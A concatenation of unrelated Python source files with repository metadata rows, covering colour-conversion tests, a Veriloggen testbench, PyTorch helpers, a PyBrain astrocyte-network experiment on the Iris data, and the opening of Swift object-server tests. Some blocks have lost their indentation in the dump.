    assert expected == rgb
# 8-digit hex decodes to RGBA with a float alpha by default...
@pytest.mark.parametrize('color, expected', (('#fff', (255, 255, 255)),
                                             ('#0000ffcc', (0, 0, 255, .8)),
                                             ('#949494E8', (148, 148, 148, 0.91)),
                                             ))
def test_hex_to_rgba(color, expected):
    assert expected == colors._hex_to_rgb_or_rgba(color)
# ...and to an integer alpha (0-255) when alpha_float=False.
@pytest.mark.parametrize('color, expected', (('#fff', (255, 255, 255)),
                                             ('#0000ffcc', (0, 0, 255, 204)),
                                             ('#949494E8', (148, 148, 148, 232)),
                                             ))
def test_hex_to_rgba_alpha_int(color, expected):
    assert expected == colors._hex_to_rgb_or_rgba(color, alpha_float=False)
def _make_valid_hexcodes_rgb_data():
data = (
('#000', (0, 0, 0)),
('#FF1493', (255, 20, 147)),
('#FA8072', (250, 128, 114)),
('00F', (0, 0, 255)),
('#800000', (128, 0, 0)),
('#812dd3', (129, 45, 211)),
)
for name, expected in data:
yield name, expected
yield name.title(), expected
yield name.upper(), expected
yield name.lower(), expected
# Every casing variant of a valid hex code must resolve to its 3-tuple RGB.
@pytest.mark.parametrize('name, expected', _make_valid_hexcodes_rgb_data())
def test_valid_hexcodes_rgb(name, expected):
    rgb = colors._color_to_rgb(name)
    assert 3 == len(rgb)
    assert expected == rgb
def _make_valid_hexcodes_rgba_data():
data = (
('#808000', (128, 128, 0, 1.0)),
('red', (255, 0, 0, 1.0)),
)
for name, expected in data:
yield name, expected
yield name.title(), expected
yield name.upper(), expected
yield name.lower(), expected
# RGBA conversion: names/hex get an implicit opaque alpha of 1.0.
@pytest.mark.parametrize('name, expected', _make_valid_hexcodes_rgba_data())
def test_valid_hexcodes_rgba(name, expected):
    rgba = colors._color_to_rgba(name)
    assert 4 == len(rgba)
    assert expected == rgba
# Tuples pass through; float alpha is kept as-is by default...
@pytest.mark.parametrize('t, expected', (
    ('#808000', (128, 128, 0, 1.0)),
    ('red', (255, 0, 0, 1.0)),
    ((255, 0, 0, .2), (255, 0, 0, .2)),
))
def test_tuple_to_rgba(t, expected):
    rgba = colors._color_to_rgba(t)
    assert expected == rgba
# ...and scaled to an integer 0-255 when alpha_float=False.
@pytest.mark.parametrize('t, expected', (
    ('#808000', (128, 128, 0, 255)),
    ('red', (255, 0, 0, 255)),
    ((0, 0, 255, .8), (0, 0, 255, 204)),
))
def test_tuple_to_rgba_int(t, expected):
    rgba = colors._color_to_rgba(t, alpha_float=False)
    assert expected == rgba
# Channel-wise inversion: each component maps to 255 - value.
@pytest.mark.parametrize('color, expected', (
    ((0, 0, 0), (255, 255, 255)),
    ((255, 255, 255), (0, 0, 0)),
    ((123, 123, 123), (132, 132, 132)),
    ((60, 70, 80), (195, 185, 175)),
))
def test_invert_color(color, expected):
    assert expected == colors._invert_color(color)
if __name__ == '__main__':
    pytest.main([__file__])
| [
"[email protected]"
] | |
1b90c28e59e5d4a5998f4d6c2027b2eacdd7467f | 1d9356626550004745bbc14de9a3308753afcea5 | /sample/tests/while/led.py | 2d6f9c7e92fa414d08993efca62d0115951efe0e | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | hoangt/veriloggen | e916290aa15c63f03ec0ad8e9c8bdf183787fbe9 | 8e7bd1ff664a6d683c3b7b31084ff4d961c4c841 | refs/heads/master | 2021-01-14T12:01:03.686270 | 2015-09-18T06:49:20 | 2015-09-18T06:49:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 806 | py | import sys
import os
from veriloggen import *
def mkTest():
    # Build a Veriloggen testbench module: VCD dump, a free-running clock
    # (toggled every 5 time units), a reset pulse, then a 1024-iteration
    # counter clocked on posedge CLK before $finish.
    m = Module('test')
    clk = m.Reg('CLK')
    rst = m.Reg('RST')
    count = m.Reg('count', width=32)
    # Waveform dump of the three signals.
    m.Initial(
        Systask('dumpfile', 'uut.vcd'),
        Systask('dumpvars', 0, clk, rst, count),
    )
    # Clock generator.
    m.Initial(
        clk(0),
        Forever(clk(Not(clk), ldelay=5)) # forever #5 CLK = ~CLK;
    )
    # Stimulus: 100-unit reset pulse, settle, then count to 1024.
    m.Initial(
        rst(0),
        Delay(100),
        rst(1),
        Delay(100),
        rst(0),
        Delay(1000),
        count(0),
        While(count < 1024)(
            count( count + 1 ),
            Event(Posedge(clk))
        ),
        Systask('finish'),
    )
    return m
if __name__ == '__main__':
    # Generate the testbench, write it to tmp.v and echo it to stdout.
    module = mkTest()
    code = module.to_verilog('tmp.v')
    print(code)
| [
"[email protected]"
] | |
3233cf987d1529f760bef548e7a959952c37b30f | 98e1155518b292341e60908d12233a2b130cb043 | /helpers.py | cabba2a794108cc9b151778f12f403862f7ef99b | [] | no_license | bkj/pbtnet | 5443a580e1bca91e4c293ae2be8bdefb85a44ce0 | e8c7b11be92e5ff9e4facccf908e87611b7f72bb | refs/heads/master | 2021-05-02T13:49:50.894351 | 2018-02-08T03:48:25 | 2018-02-08T03:48:25 | 120,707,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 644 | py | #!/usr/bin/env python
"""
helpers.py
"""
from __future__ import print_function, division
import numpy as np
import torch
from torch import nn
from torch.autograd import Variable
def to_numpy(x):
    """Convert a torch Tensor (or autograd Variable) to a numpy array,
    moving it to the CPU first when it lives on the GPU."""
    if isinstance(x, Variable):
        x = x.data
    return x.cpu().numpy() if x.is_cuda else x.numpy()
def set_seeds(seed):
    """Deterministically seed the numpy and torch (CPU + CUDA) RNGs.

    The +123/+456 offsets keep the generators from all sharing the
    same raw seed value.
    """
    np.random.seed(seed)
    torch.manual_seed(seed + 123)
    torch.cuda.manual_seed(seed + 456)
class Flatten(nn.Module):
    """Flatten every dimension after the batch dimension."""
    def forward(self, x):
        batch_size = x.shape[0]
        return x.view(batch_size, -1)
def ablate(x, p):
    """Zero each non-batch element independently with probability ``p``,
    using one mask broadcast across the batch dimension. The mask is
    created on the GPU, so CUDA is required."""
    keep_mask = torch.rand((1,) + x.shape[1:]).cuda() > p
    return x * Variable(keep_mask).float()
| [
"[email protected]"
] | |
90cb117fe81c46994501a28739c375f1f067da8f | 256644d14bd15f8e1a3e92c95b1655fd36681399 | /backup/mypybrain/angn.py | 2f5f9b3be43027253373cedda5b32243ca76c87d | [] | no_license | mfbx9da4/neuron-astrocyte-networks | 9d1c0ff45951e45ce1f8297ec62b69ee4159305a | bcf933491bdb70031f8d9c859fc17e0622e5b126 | refs/heads/master | 2021-01-01T10:13:59.099090 | 2018-06-03T12:32:13 | 2018-06-03T12:32:13 | 12,457,305 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,739 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Feb 14 17:48:37 2013
The activation function was the hyperbolic tangent in all the
layers, except in the output layer where the threshold function was
used with a threshold value of 0.5 and an expected binary output.
All layers have astrocytes
Weight limiting? Decision of neurons will never change
Modification of weights - input or output weights? Potential implied
method:
* Input astrocytes modify output weights
* Hidden astrocytes modify both input and output weights
* Output astrocytes modify input weights
associated neuronal connections were active for at least n out of m
iterations (n: 2 to 3; m: 4, 6, 8), and 2) considering the time unit as
a single iteration, astrocytic effects lasted 4 to 8 iterations, and the
neuronal connection weights gradually increased (25%) or
decreased (50%) if the associated astrocyte was active or inactive,
respectively.
The combinations (Astrocytic Sensitivity, Neuron-glia power
connection: 2,4; 3,6; 2,6 and 3,8) were determined by trial-and-error,
and allowed an upper limit of 3, 4, 5 or 6 astrocytic activations,
respectively.
@author: david
"""
import random
import datetime
import os
from pybrain.datasets import ClassificationDataSet
from pybrain.utilities import percentError
from pybrain.supervised.trainers import BackpropTrainer
from pybrain.structure import TanhLayer
from pybrain.tools.shortcuts import buildNetwork
from numpy import array, ones, zeros, append
import numpy as np
from astrocyte_layer import AstrocyteLayer
from plotting.plotters import plotPercentageErrorBar, plotPercentageNoErrorBar
from mymodules.threshold import ThresholdLayer
def createDS():
# taken from iris data set at machine learning repository
pat = [[[5.1, 3.5, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.9, 3.0, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.7, 3.2, 1.3, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.6, 3.1, 1.5, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.6, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.4, 3.9, 1.7, 0.4], [1, 0, 0], [0], ['Iris-setosa']], [[4.6, 3.4, 1.4, 0.3], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.4, 1.5, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.4, 2.9, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.9, 3.1, 1.5, 0.1], [1, 0, 0], [0], ['Iris-setosa']], [[5.4, 3.7, 1.5, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.8, 3.4, 1.6, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.8, 3.0, 1.4, 0.1], [1, 0, 0], [0], ['Iris-setosa']], [[4.3, 3.0, 1.1, 0.1], [1, 0, 0], [0], ['Iris-setosa']], [[5.8, 4.0, 1.2, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.7, 4.4, 1.5, 0.4], [1, 0, 0], [0], ['Iris-setosa']], [[5.4, 3.9, 1.3, 0.4], [1, 0, 0], [0], ['Iris-setosa']], [[5.1, 3.5, 1.4, 0.3], [1, 0, 0], [0], ['Iris-setosa']], [[5.7, 3.8, 1.7, 0.3], [1, 0, 0], [0], ['Iris-setosa']], [[5.1, 3.8, 1.5, 0.3], [1, 0, 0], [0], ['Iris-setosa']], [[5.4, 3.4, 1.7, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.1, 3.7, 1.5, 0.4], [1, 0, 0], [0], ['Iris-setosa']], [[4.6, 3.6, 1.0, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.1, 3.3, 1.7, 0.5], [1, 0, 0], [0], ['Iris-setosa']], [[4.8, 3.4, 1.9, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.0, 1.6, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.4, 1.6, 0.4], [1, 0, 0], [0], ['Iris-setosa']], [[5.2, 3.5, 1.5, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.2, 3.4, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.7, 3.2, 1.6, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.8, 3.1, 1.6, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.4, 3.4, 1.5, 0.4], [1, 0, 0], [0], ['Iris-setosa']], [[5.2, 4.1, 1.5, 0.1], [1, 0, 0], [0], ['Iris-setosa']], [[5.5, 4.2, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.9, 3.1, 1.5, 0.1], [1, 0, 0], [0], 
['Iris-setosa']], [[5.0, 3.2, 1.2, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.5, 3.5, 1.3, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.9, 3.1, 1.5, 0.1], [1, 0, 0], [0], ['Iris-setosa']], [[4.4, 3.0, 1.3, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.1, 3.4, 1.5, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.5, 1.3, 0.3], [1, 0, 0], [0], ['Iris-setosa']], [[4.5, 2.3, 1.3, 0.3], [1, 0, 0], [0], ['Iris-setosa']], [[4.4, 3.2, 1.3, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.5, 1.6, 0.6], [1, 0, 0], [0], ['Iris-setosa']], [[5.1, 3.8, 1.9, 0.4], [1, 0, 0], [0], ['Iris-setosa']], [[4.8, 3.0, 1.4, 0.3], [1, 0, 0], [0], ['Iris-setosa']], [[5.1, 3.8, 1.6, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.6, 3.2, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.3, 3.7, 1.5, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.3, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[7.0, 3.2, 4.7, 1.4], [0, 1, 0], [1], ['Iris-versicolor']], [[6.4, 3.2, 4.5, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[6.9, 3.1, 4.9, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[5.5, 2.3, 4.0, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[6.5, 2.8, 4.6, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[5.7, 2.8, 4.5, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[6.3, 3.3, 4.7, 1.6], [0, 1, 0], [1], ['Iris-versicolor']], [[4.9, 2.4, 3.3, 1.0], [0, 1, 0], [1], ['Iris-versicolor']], [[6.6, 2.9, 4.6, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[5.2, 2.7, 3.9, 1.4], [0, 1, 0], [1], ['Iris-versicolor']], [[5.0, 2.0, 3.5, 1.0], [0, 1, 0], [1], ['Iris-versicolor']], [[5.9, 3.0, 4.2, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[6.0, 2.2, 4.0, 1.0], [0, 1, 0], [1], ['Iris-versicolor']], [[6.1, 2.9, 4.7, 1.4], [0, 1, 0], [1], ['Iris-versicolor']], [[5.6, 2.9, 3.6, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[6.7, 3.1, 4.4, 1.4], [0, 1, 0], [1], ['Iris-versicolor']], [[5.6, 3.0, 4.5, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[5.8, 2.7, 4.1, 1.0], [0, 1, 0], [1], ['Iris-versicolor']], [[6.2, 2.2, 4.5, 1.5], [0, 
1, 0], [1], ['Iris-versicolor']], [[5.6, 2.5, 3.9, 1.1], [0, 1, 0], [1], ['Iris-versicolor']], [[5.9, 3.2, 4.8, 1.8], [0, 1, 0], [1], ['Iris-versicolor']], [[6.1, 2.8, 4.0, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[6.3, 2.5, 4.9, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[6.1, 2.8, 4.7, 1.2], [0, 1, 0], [1], ['Iris-versicolor']], [[6.4, 2.9, 4.3, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[6.6, 3.0, 4.4, 1.4], [0, 1, 0], [1], ['Iris-versicolor']], [[6.8, 2.8, 4.8, 1.4], [0, 1, 0], [1], ['Iris-versicolor']], [[6.7, 3.0, 5.0, 1.7], [0, 1, 0], [1], ['Iris-versicolor']], [[6.0, 2.9, 4.5, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[5.7, 2.6, 3.5, 1.0], [0, 1, 0], [1], ['Iris-versicolor']], [[5.5, 2.4, 3.8, 1.1], [0, 1, 0], [1], ['Iris-versicolor']], [[5.5, 2.4, 3.7, 1.0], [0, 1, 0], [1], ['Iris-versicolor']], [[5.8, 2.7, 3.9, 1.2], [0, 1, 0], [1], ['Iris-versicolor']], [[6.0, 2.7, 5.1, 1.6], [0, 1, 0], [1], ['Iris-versicolor']], [[5.4, 3.0, 4.5, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[6.0, 3.4, 4.5, 1.6], [0, 1, 0], [1], ['Iris-versicolor']], [[6.7, 3.1, 4.7, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[6.3, 2.3, 4.4, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[5.6, 3.0, 4.1, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[5.5, 2.5, 4.0, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[5.5, 2.6, 4.4, 1.2], [0, 1, 0], [1], ['Iris-versicolor']], [[6.1, 3.0, 4.6, 1.4], [0, 1, 0], [1], ['Iris-versicolor']], [[5.8, 2.6, 4.0, 1.2], [0, 1, 0], [1], ['Iris-versicolor']], [[5.0, 2.3, 3.3, 1.0], [0, 1, 0], [1], ['Iris-versicolor']], [[5.6, 2.7, 4.2, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[5.7, 3.0, 4.2, 1.2], [0, 1, 0], [1], ['Iris-versicolor']], [[5.7, 2.9, 4.2, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[6.2, 2.9, 4.3, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[5.1, 2.5, 3.0, 1.1], [0, 1, 0], [1], ['Iris-versicolor']], [[5.7, 2.8, 4.1, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[6.3, 3.3, 6.0, 2.5], [0, 0, 1], [2], ['Iris-virginica']], [[5.8, 2.7, 
5.1, 1.9], [0, 0, 1], [2], ['Iris-virginica']], [[7.1, 3.0, 5.9, 2.1], [0, 0, 1], [2], ['Iris-virginica']], [[6.3, 2.9, 5.6, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.5, 3.0, 5.8, 2.2], [0, 0, 1], [2], ['Iris-virginica']], [[7.6, 3.0, 6.6, 2.1], [0, 0, 1], [2], ['Iris-virginica']], [[4.9, 2.5, 4.5, 1.7], [0, 0, 1], [2], ['Iris-virginica']], [[7.3, 2.9, 6.3, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.7, 2.5, 5.8, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[7.2, 3.6, 6.1, 2.5], [0, 0, 1], [2], ['Iris-virginica']], [[6.5, 3.2, 5.1, 2.0], [0, 0, 1], [2], ['Iris-virginica']], [[6.4, 2.7, 5.3, 1.9], [0, 0, 1], [2], ['Iris-virginica']], [[6.8, 3.0, 5.5, 2.1], [0, 0, 1], [2], ['Iris-virginica']], [[5.7, 2.5, 5.0, 2.0], [0, 0, 1], [2], ['Iris-virginica']], [[5.8, 2.8, 5.1, 2.4], [0, 0, 1], [2], ['Iris-virginica']], [[6.4, 3.2, 5.3, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[6.5, 3.0, 5.5, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[7.7, 3.8, 6.7, 2.2], [0, 0, 1], [2], ['Iris-virginica']], [[7.7, 2.6, 6.9, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[6.0, 2.2, 5.0, 1.5], [0, 0, 1], [2], ['Iris-virginica']], [[6.9, 3.2, 5.7, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[5.6, 2.8, 4.9, 2.0], [0, 0, 1], [2], ['Iris-virginica']], [[7.7, 2.8, 6.7, 2.0], [0, 0, 1], [2], ['Iris-virginica']], [[6.3, 2.7, 4.9, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.7, 3.3, 5.7, 2.1], [0, 0, 1], [2], ['Iris-virginica']], [[7.2, 3.2, 6.0, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.2, 2.8, 4.8, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.1, 3.0, 4.9, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.4, 2.8, 5.6, 2.1], [0, 0, 1], [2], ['Iris-virginica']], [[7.2, 3.0, 5.8, 1.6], [0, 0, 1], [2], ['Iris-virginica']], [[7.4, 2.8, 6.1, 1.9], [0, 0, 1], [2], ['Iris-virginica']], [[7.9, 3.8, 6.4, 2.0], [0, 0, 1], [2], ['Iris-virginica']], [[6.4, 2.8, 5.6, 2.2], [0, 0, 1], [2], ['Iris-virginica']], [[6.3, 2.8, 5.1, 1.5], [0, 0, 1], [2], ['Iris-virginica']], [[6.1, 2.6, 5.6, 1.4], [0, 0, 
1], [2], ['Iris-virginica']], [[7.7, 3.0, 6.1, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[6.3, 3.4, 5.6, 2.4], [0, 0, 1], [2], ['Iris-virginica']], [[6.4, 3.1, 5.5, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.0, 3.0, 4.8, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.9, 3.1, 5.4, 2.1], [0, 0, 1], [2], ['Iris-virginica']], [[6.7, 3.1, 5.6, 2.4], [0, 0, 1], [2], ['Iris-virginica']], [[6.9, 3.1, 5.1, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[5.8, 2.7, 5.1, 1.9], [0, 0, 1], [2], ['Iris-virginica']], [[6.8, 3.2, 5.9, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[6.7, 3.3, 5.7, 2.5], [0, 0, 1], [2], ['Iris-virginica']], [[6.7, 3.0, 5.2, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[6.3, 2.5, 5.0, 1.9], [0, 0, 1], [2], ['Iris-virginica']], [[6.5, 3.0, 5.2, 2.0], [0, 0, 1], [2], ['Iris-virginica']], [[6.2, 3.4, 5.4, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[5.9, 3.0, 5.1, 1.8], [0, 0, 1], [2], ['Iris-virginica']]]
alldata = ClassificationDataSet(4, 1, nb_classes=3,
class_labels=['set', 'vers', 'virg'])
for p in pat:
t = p[2]
alldata.addSample(p[0], t)
tstdata, trndata = alldata.splitWithProportion(0.33)
trndata._convertToOneOfMany()
tstdata._convertToOneOfMany()
return trndata, tstdata
"""
Although output layer should be binary with threshold bias layer of 0.5
and input layer should be tanh
"""
def createNN(indim, hiddim, outdim):
    """Build a feed-forward net: tanh hidden layer, threshold output, no bias."""
    network = buildNetwork(
        indim,
        hiddim,
        outdim,
        bias=False,
        hiddenclass=TanhLayer,
        outclass=ThresholdLayer,
    )
    network.sortModules()
    return network
def associateAstrocyteLayers(nn):
    """Attach an AstrocyteLayer to the hidden and the output layer of *nn*."""
    (input_connection,) = nn.connections[nn['in']]
    (hidden_connection,) = nn.connections[nn['hidden0']]
    hidden_astro = AstrocyteLayer(nn['hidden0'], input_connection)
    output_astro = AstrocyteLayer(nn['out'], hidden_connection)
    return hidden_astro, output_astro
repeats = 3  # number of independent training trials
iterations = 500  # training epochs per trial
all_trn_results = []  # per-trial lists of training-set percent errors
all_tst_results = []  # per-trial lists of test-set percent errors
def trainNGA(nn, trndata, hiddenAstrocyteLayer, outputAstrocyteLayer):
    """One NGA pass: activate the net on every training input in random
    order, letting each astrocyte layer run its processing iterations and
    then reset after each activation.

    Bug fix: a shuffled copy of the inputs was built but the loop iterated
    the *unshuffled* ``trndata['input']``, so the shuffle had no effect;
    iterate the shuffled list so presentation order is actually random.
    """
    inputs = list(trndata['input'])
    random.shuffle(inputs)
    for inpt in inputs:
        nn.activate(inpt)
        for _ in range(hiddenAstrocyteLayer.astrocyte_processing_iters):
            hiddenAstrocyteLayer.update()
            outputAstrocyteLayer.update()
        hiddenAstrocyteLayer.reset()
        outputAstrocyteLayer.reset()
def main():
trndata, tstdata = createDS()
for repeat in xrange(repeats):
print 'trial', repeat
iter_trn_results = []
iter_tst_results = []
nn = createNN(4, 6, 3)
nn.randomize()
hiddenAstrocyteLayer, outputAstrocyteLayer = \
associateAstrocyteLayers(nn)
trainer = BackpropTrainer(nn, dataset=trndata, learningrate=0.01,
momentum=0.1, verbose=False, weightdecay=0.0)
for grand_iter in xrange(iterations):
if grand_iter == 0:
trainer.train()
# trainNGA(nn, trndata, hiddenAstrocyteLayer, outputAstrocyteLayer)
trainer.train()
trnresult = percentError(trainer.testOnClassData(),
trndata['class'])
iter_trn_results.append(trnresult)
tstresult = percentError(trainer.testOnClassData(dataset=tstdata),
tstdata['class'])
iter_tst_results.append(tstresult)
if not grand_iter % 100:
print 'epoch %4d' % trainer.totalepochs, 'train error %5.2f%%'\
% trnresult, 'test error %5.2f%%' % tstresult
# MAKE SURE NOT IN ITER LOOP
all_trn_results.append(iter_trn_results)
all_tst_results.append(iter_tst_results)
assert array(iter_trn_results).shape == (iterations, ), \
array(iter_trn_results).shape
assert array(iter_tst_results).shape == (iterations, ), \
array(iter_tst_results).shape
assert array(all_trn_results).shape == (repeats, iterations), \
array(all_trn_results).shape
assert array(all_tst_results).shape == (repeats, iterations), \
array(all_tst_results).shape
a = datetime.datetime.now(). utctimetuple()
time_string = str(a[3]) + str(a[4]) + '_' + str(a[2]) + '-' + \
str(a[1]) + '-' + str(a[0])
if os.environ['OS'] == 'Windows_NT':
sep = '\\'
else:
sep = '/'
pybrain_dir = os.getcwd() + sep
assert pybrain_dir[-10:-1] == 'mypybrain', \
'is actually this ' + pybrain_dir[-10:-1]
os.mkdir(pybrain_dir + 'experiment_results' + sep + time_string)
trnf = open(pybrain_dir + 'experiment_results' + sep + time_string +
'/all_trn_results.out', 'w')
np.savetxt(trnf, all_trn_results)
tstf = open(pybrain_dir + 'experiment_results' + sep + time_string +
'/all_tst_results.out', 'w')
np.savetxt(tstf, all_tst_results)
# Script entry point.
if __name__ == '__main__':
    main()
| [
"[email protected]"
] | |
a0c8ab45ee293002eb2896412bc5d8ad46314948 | f62fd455e593a7ad203a5c268e23129473d968b6 | /swift-2.13.1/test/unit/obj/test_server.py | 03e40a730d03da0616400cb61955cb0a5ba0eec7 | [
"Apache-2.0"
] | permissive | MinbinGong/OpenStack-Ocata | 5d17bcd47a46d48ff9e71e2055f667836174242f | 8b7650128cfd2fdf5d6c8bc4613ac2e396fb2fb3 | refs/heads/master | 2021-06-23T05:24:37.799927 | 2017-08-14T04:33:05 | 2017-08-14T04:33:05 | 99,709,985 | 0 | 2 | null | 2020-07-22T22:06:22 | 2017-08-08T15:48:44 | Python | UTF-8 | Python | false | false | 340,294 | py | # coding: utf-8
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for swift.obj.server"""
import six.moves.cPickle as pickle
import datetime
import json
import errno
import operator
import os
import mock
import six
from six import StringIO
import unittest
import math
import random
from shutil import rmtree
from time import gmtime, strftime, time, struct_time
from tempfile import mkdtemp
from hashlib import md5
import tempfile
from collections import defaultdict
from contextlib import contextmanager
from textwrap import dedent
from eventlet import sleep, spawn, wsgi, Timeout, tpool, greenthread
from eventlet.green import httplib
from nose import SkipTest
from swift import __version__ as swift_version
from swift.common.http import is_success
from test import listen_zero
from test.unit import FakeLogger, debug_logger, mocked_http_conn, \
make_timestamp_iter, DEFAULT_TEST_EC_TYPE
from test.unit import connect_tcp, readuntil2crlfs, patch_policies, \
encode_frag_archive_bodies
from swift.obj import server as object_server
from swift.obj import updater
from swift.obj import diskfile
from swift.common import utils, bufferedhttp
from swift.common.header_key_dict import HeaderKeyDict
from swift.common.utils import hash_path, mkdirs, normalize_timestamp, \
NullLogger, storage_directory, public, replication, encode_timestamps, \
Timestamp
from swift.common import constraints
from swift.common.swob import Request, WsgiBytesIO
from swift.common.splice import splice
from swift.common.storage_policy import (StoragePolicy, ECStoragePolicy,
POLICIES, EC_POLICY)
from swift.common.exceptions import DiskFileDeviceUnavailable, \
DiskFileNoSpace, DiskFileQuarantined
from swift.common.wsgi import init_request_processor
def mock_time(*_args, **_kwargs):
    """Stand-in for time(): accept any arguments, always return 5000.0."""
    return 5000.0
# Policies installed by @patch_policies on the test case below: a default
# replication policy plus a 10+4 EC policy.
test_policies = [
    StoragePolicy(0, name='zero', is_default=True),
    ECStoragePolicy(1, name='one', ec_type=DEFAULT_TEST_EC_TYPE,
                    ec_ndata=10, ec_nparity=4),
]
@contextmanager
def fake_spawn():
    """
    Spawn and capture the result so we can later wait on it. This means we can
    test code executing in a greenthread but still wait() on the result to
    ensure that the method has completed.
    """
    greenlets = []

    def _inner_fake_spawn(func, *a, **kw):
        gt = greenthread.spawn(func, *a, **kw)
        greenlets.append(gt)
        return gt

    # Bug fix: previously object_server.spawn was assigned directly *before*
    # mock.patch ran, so mock recorded the fake as the "original" and
    # restored the fake on exit, leaking the monkey-patch into later tests.
    # Patching via mock.patch alone restores the real spawn on exit.
    with mock.patch('swift.obj.server.spawn', _inner_fake_spawn):
        try:
            yield
        finally:
            for gt in greenlets:
                gt.wait()
@patch_policies(test_policies)
class TestObjectController(unittest.TestCase):
    """Tests for swift.obj.server.ObjectController."""
    def setUp(self):
        """Set up for testing swift.object.server.ObjectController"""
        # Fixed hash path prefix/suffix so on-disk hash locations are
        # deterministic across test runs.
        utils.HASH_PATH_SUFFIX = 'endcap'
        utils.HASH_PATH_PREFIX = 'startcap'
        self.tmpdir = mkdtemp()
        self.testdir = os.path.join(self.tmpdir,
                                    'tmp_test_object_server_ObjectController')
        mkdirs(os.path.join(self.testdir, 'sda1'))
        self.conf = {'devices': self.testdir, 'mount_check': 'false',
                     'container_update_timeout': 0.0}
        self.object_controller = object_server.ObjectController(
            self.conf, logger=debug_logger())
        self.object_controller.bytes_per_sync = 1
        # Run tpool work inline so threadpool calls are synchronous; the
        # original tpool.execute is restored in tearDown.
        self._orig_tpool_exc = tpool.execute
        tpool.execute = lambda f, *args, **kwargs: f(*args, **kwargs)
        self.df_mgr = diskfile.DiskFileManager(self.conf,
                                               self.object_controller.logger)
        self.logger = debug_logger('test-object-controller')
        self.ts = make_timestamp_iter()
        self.ec_policies = [p for p in POLICIES if p.policy_type == EC_POLICY]
def tearDown(self):
"""Tear down for testing swift.object.server.ObjectController"""
rmtree(self.tmpdir)
tpool.execute = self._orig_tpool_exc
def _stage_tmp_dir(self, policy):
